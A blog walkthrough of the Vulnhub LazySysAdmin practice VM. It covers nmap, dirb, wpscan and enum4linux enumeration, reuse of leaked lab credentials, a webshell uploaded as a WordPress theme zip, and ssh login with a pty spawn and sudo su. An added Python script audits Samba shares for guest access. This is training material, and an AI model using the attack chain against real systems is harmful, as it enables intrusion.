Yoga7xm's Blog

Vulnhub: LazySysAdmin

Word count: 2k | Reading time: 10 min
2019/01/04

0x00 Preface

The story of a lonely and lazy sysadmin who cries himself to sleep

Teaching newcomers the basics of Linux enumeration

Myself, I suck with Linux and wanted to learn more about each service whilst creating a playground for others to learn

0x01 Target VM

Link: https://www.vulnhub.com/entry/lazysysadmin-1,205

0x02 Lab setup

  • Target: 192.168.2.104 (found with an nmap scan)
  • Attacker (Windows): 192.168.2.107
  • Attacker (Kali): 192.168.2.156

0x03 Play

1. Information gathering

Port scan

nmap -sS -A -p- -v -T4 192.168.2.104

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
| 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
| 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_ 256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd
| irc-info:
| server: Admin.local
| users: 1
| servers: 1
| chans: 0
| lusers: 1
| lservers: 0
| source ident: nmap
| source host: 192.168.2.156
|_ error: Closing link: (nmap@192.168.2.156) [Client exited]

Directory scan

dirb http://192.168.2.104/ -r

==> DIRECTORY: http://192.168.2.104/apache/
+ http://192.168.2.104/index.html (CODE:200|SIZE:36072)
+ http://192.168.2.104/info.php (CODE:200|SIZE:77257)
==> DIRECTORY: http://192.168.2.104/javascript/
==> DIRECTORY: http://192.168.2.104/old/
==> DIRECTORY: http://192.168.2.104/phpmyadmin/
+ http://192.168.2.104/robots.txt (CODE:200|SIZE:92)
+ http://192.168.2.104/server-status (CODE:403|SIZE:293)
==> DIRECTORY: http://192.168.2.104/test/
==> DIRECTORY: http://192.168.2.104/wordpress/
==> DIRECTORY: http://192.168.2.104/wp/

This turned up a wp directory and a phpmyadmin directory, plus a few directories with directory traversal (listing) issues, though those turned out to be of no use.

2. Vulnerability discovery

Open the wp home page.

The name togie is stressed repeatedly, which suggests it is probably a username; next, wpscan was used to check for vulnerabilities.

root@kali:~# wpscan http://192.168.2.104/wordpress/
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.2.104/wordpress/
[+] Started: Sun Jan 27 16:07:02 2019

[!] The WordPress 'http://192.168.2.104/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://192.168.2.104/wordpress/index.php?rest_route=/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.22
[!] Registration is enabled: http://192.168.2.104/wordpress/wp-login.php?action=register
[+] XML-RPC Interface available under: http://192.168.2.104/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.2.104/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://192.168.2.104/wordpress/wp-includes/

[+] WordPress version 4.8.8 (Released on 2018-12-13) identified from meta generator, links opml

[+] WordPress theme in use: twentyfifteen - v1.8

[+] Name: twentyfifteen - v1.8
| Last updated: 2019-01-09T00:00:00.000Z
| Location: http://192.168.2.104/wordpress/wp-content/themes/twentyfifteen/
| Readme: http://192.168.2.104/wordpress/wp-content/themes/twentyfifteen/readme.txt
[!] The version is out of date, the latest version is 2.3
| Style URL: http://192.168.2.104/wordpress/wp-content/themes/twentyfifteen/style.css
| Theme Name: Twenty Fifteen
| Theme URI: https://wordpress.org/themes/twentyfifteen/
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple,...
| Author: the WordPress team
| Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Finished: Sun Jan 27 16:07:07 2019
[+] Requests Done: 373
[+] Memory used: 40.688 MB
[+] Elapsed time: 00:00:04

No high-severity vulnerability usable to get a shell was found, however, so the focus shifted to Samba on ports 445 and 139.

root@kali:~# enum4linux 192.168.2.104
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jan 27 16:26:50 2019

==========================
| Target Information |
==========================
Target ........... 192.168.2.104
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


=====================================================
| Enumerating Workgroup/Domain on 192.168.2.104 |
=====================================================
[+] Got domain/workgroup name: WORKGROUP

=============================================
| Nbtstat Information for 192.168.2.104 |
=============================================
Looking up status of 192.168.2.104
LAZYSYSADMIN <00> - B <ACTIVE> Workstation Service
LAZYSYSADMIN <03> - B <ACTIVE> Messenger Service
LAZYSYSADMIN <20> - B <ACTIVE> File Server Service
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections

MAC Address = 00-00-00-00-00-00

======================================
| Session Check on 192.168.2.104 |
======================================
[+] Server 192.168.2.104 allows sessions using username '', password ''

============================================
| Getting domain SID for 192.168.2.104 |
============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

=======================================
| OS information on 192.168.2.104 |
=======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.2.104 from smbclient:
[+] Got OS info for 192.168.2.104 from srvinfo:
LAZYSYSADMIN Wk Sv PrQ Unx NT SNT Web server
platform_id : 500
os version : 6.1
server type : 0x809a03

==============================
| Users on 192.168.2.104 |
==============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

==========================================
| Share Enumeration on 192.168.2.104 |
==========================================
WARNING: The "syslog" option is deprecated

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
share$ Disk Sumshare
IPC$ IPC IPC Service (Web server)
Reconnecting with SMB1 for workgroup listing.

Server Comment
--------- -------

Workgroup Master
--------- -------
WORKGROUP YOGA-PC

[+] Attempting to map shares on 192.168.2.104
//192.168.2.104/print$ Mapping: DENIED, Listing: N/A
//192.168.2.104/share$ Mapping: OK, Listing: OK
//192.168.2.104/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

Three shares were found, all accessible with an empty username and password, so on the Windows box the shares were mapped one by one and the website source code was obtained.

C:\Users\Yoga
$ net use g: \\192.168.2.104\share$
命令成功完成。

The idea was to find the database credentials, log in to phpMyAdmin, locate the wp users table and manually add an admin account and password (the hashed password can be obtained by setting up a local wp install, reading the value from its database and inserting that account and password), then get a shell from the admin panel.

This yielded Admin:TogieMYSQL12345^^. Logging in to phpMyAdmin with it worked, but an attempt to write a one-line webshell failed for lack of privileges, and viewing or modifying any data also threw errors 0.0

Logging in to the wp admin panel with the same credentials, however, succeeded.
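As an added example (not part of the original walkthrough), a small Python audit that flags the misconfiguration enum4linux surfaced here: a Samba share that a null session can map and whose path is the web root, which is how wp-config.php and its database credentials became readable. The smb.conf text is constructed; 'Sumshare' and /var/www/html echo the walkthrough, every other value is assumed.

```python
"""Audit smb.conf for shares that expose a web root to guest (null-session) clients.
Added example, not from the original post; the config text below is constructed."""
import configparser
import io
import posixpath

# Constructed sample: share$ hands /var/www/html to guests, print$ does not.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
[print$]
   comment = Printer Drivers
   path = /var/lib/samba/printers
   guest ok = no
[share$]
   comment = Sumshare
   path = /var/www/html
   guest ok = yes
   read only = no
"""
WEB_ROOTS = ("/var/www", "/srv/www", "/usr/share/nginx")


def parse_smb_conf(text):
    """Return {share: {option: value}}; Samba option names are case-insensitive."""
    parser = configparser.RawConfigParser(strict=False)
    parser.optionxform = str.lower
    parser.read_file(io.StringIO(text))
    return {s: dict(parser.items(s)) for s in parser.sections()}


def is_yes(value):
    return value.strip().lower() in ("yes", "true", "1")


def guest_exposed_web_shares(conf):
    """Shares a null session can open (guest ok / public / guest only = yes) whose
    path is a web root or lies inside one. Such a share leaks wp-config.php and
    its DB credentials; if it is also writable, any client can drop files in the site."""
    findings = []
    for share, opts in conf.items():
        if share == "global":
            continue
        guest = any(is_yes(opts.get(k, "no")) for k in ("guest ok", "public", "guest only"))
        path = posixpath.normpath(opts.get("path", ""))
        in_web_root = any(path == r or path.startswith(r + "/") for r in WEB_ROOTS)
        if guest and in_web_root:
            # Samba defaults to 'read only = yes'; 'writable = yes' is the inverse synonym.
            writable = is_yes(opts.get("writable", "no")) or not is_yes(opts.get("read only", "yes"))
            findings.append({"share": share, "path": path, "writable": writable})
    return findings
```

Run it against the real /etc/samba/smb.conf by passing the file's contents to parse_smb_conf; an empty result means no guest-readable share sits on a known web root.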

3. Getshell

Create a folder locally, put a one-line webshell in it, compress the folder into wp.zip, then upload it through the theme upload page.

At that point the path of the already-extracted files could be found in the share from earlier, K:\wordpress\wp-content\upgrade\wp\wp, and the webshell was connected to with China Chopper (菜刀).

4. Privilege escalation

Check the distribution and kernel version

[/var/www/html/wordpress/wp-content/upgrade/wp-2/wp/]$ uname -a
Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux


[/var/www/html/wordpress/wp-content/upgrade/wp-2/wp/]$ cat /etc/os-release
NAME="Ubuntu"
VERSION="14.04.5 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.5 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"

Ubuntu 14.04.5 with kernel 4.4.0-31-generic.

Google turned up CVE-2017-1000112.

The exploit was downloaded, but gcc is not present on the target, so it had to be compiled on a machine with the same environment and then uploaded to run the privilege escalation..... but exp.c kept throwing errors.

There is always another way: a pleasant surprise turned up in the SMB share, giving the password 12345.

With the ssh service found earlier and the username togie, the login succeeded.

Then python -c 'import pty; pty.spawn("/bin/sh")' and finally sudo su does the rest.

5. GetFlag

0x04 Recap

  1. The port scan first revealed ssh, Samba and web ports.
  2. The web directory scan found a few folders with directory traversal (listing) issues, but they did not lead to a shell, and neither did the later scan of wp.
  3. When the web route led nowhere, it was back to Samba; enumerating it showed it really was vulnerable, which gave the website source code and, from it, the database credentials and the hint.
  4. Logging in to phpmyadmin succeeded, but data could not be viewed and writing the one-line webshell failed; the same password did get into the wp admin panel, though, and getting a shell by uploading a zip package is the usual routine.
  5. Escalating privileges through an overflow looked promising but failed, and no suitable exploit was found, so the password from the hint was used to get in over ssh and the flag was easily captured!!!

0x05 Reference

https://grokdesigns.com/vulnhub-walkthrough-lazysysadmin-1/
